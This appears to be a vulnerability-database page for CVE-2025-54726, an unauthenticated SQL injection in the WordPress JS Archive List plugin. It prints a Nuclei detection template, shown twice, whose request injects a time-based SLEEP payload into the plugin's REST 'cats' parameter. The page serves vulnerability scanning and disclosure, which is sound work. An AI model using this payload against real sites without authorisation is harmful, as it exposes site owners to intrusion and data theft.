WordPress JS Archive List <= 6.1.5 - SQL Injection

CVE-2025-54726

Verified

Description

Miguel Useche JS Archive List contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.

Severity

High

CVSS Score

7.5

Exploit Probability

Published Date

February 13, 2026

Template Author

shivam kamboj

CVE-2025-54726.yaml

id: CVE-2025-54726

info:
  name: WordPress JS Archive List <= 6.1.5 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    Miguel Useche JS Archive List contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jquery-archive-list-widget/js-archive-list-615-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/jquery-archive-list-widget/vulnerability/wordpress-js-archive-list-plugin-6-1-6-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54726
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-54726
    epss-score: 0.00924
    epss-percentile: 0.76259
    cwe-id: CWE-89
    cpe: cpe:2.3:a:flavor:js_archive_list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="jquery-archive-list-widget"
  tags: cve,cve2025,wordpress,wp,wp-plugin,sqli,jquery-archive-list-widget,unauth,vkev

http:
  - raw:
      - |
        @timeout: 20s
        GET /wp-json/jalw/v1/archive?cats=if(now()=sysdate(),SLEEP(6),0)&exclusionType=exclude HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains_all(body, "years","expand")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a00473045022033ae9ffc1b1d1ff6ccab3555ed5d103a76629f43abcdbe0217119eedf1e2dcf102210082b66d371b0f90e6d7535a28ccd664f0a13069154480aefdfbbc045dab3e9247:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2025-54726

CWE ID:

cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jquery-archive-list-widget/js-archive-list-615-unauthenticated-sql-injection https://patchstack.com/database/wordpress/plugin/jquery-archive-list-widget/vulnerability/wordpress-js-archive-list-plugin-6-1-6-sql-injection-vulnerability https://nvd.nist.gov/vuln/detail/CVE-2025-54726

Remediation Steps

Update to the latest version.

id: CVE-2025-54726

info:
  name: WordPress JS Archive List <= 6.1.5 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    Miguel Useche JS Archive List contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jquery-archive-list-widget/js-archive-list-615-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/jquery-archive-list-widget/vulnerability/wordpress-js-archive-list-plugin-6-1-6-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54726
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-54726
    epss-score: 0.00924
    epss-percentile: 0.76259
    cwe-id: CWE-89
    cpe: cpe:2.3:a:flavor:js_archive_list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="jquery-archive-list-widget"
  tags: cve,cve2025,wordpress,wp,wp-plugin,sqli,jquery-archive-list-widget,unauth,vkev

http:
  - raw:
      - |
        @timeout: 20s
        GET /wp-json/jalw/v1/archive?cats=if(now()=sysdate(),SLEEP(6),0)&exclusionType=exclude HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains_all(body, "years","expand")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a00473045022033ae9ffc1b1d1ff6ccab3555ed5d103a76629f43abcdbe0217119eedf1e2dcf102210082b66d371b0f90e6d7535a28ccd664f0a13069154480aefdfbbc045dab3e9247:922c64590222798bb761d5b6d8e72950

WordPress JS Archive List <= 6.1.5 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress JS Archive List <= 6.1.5 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps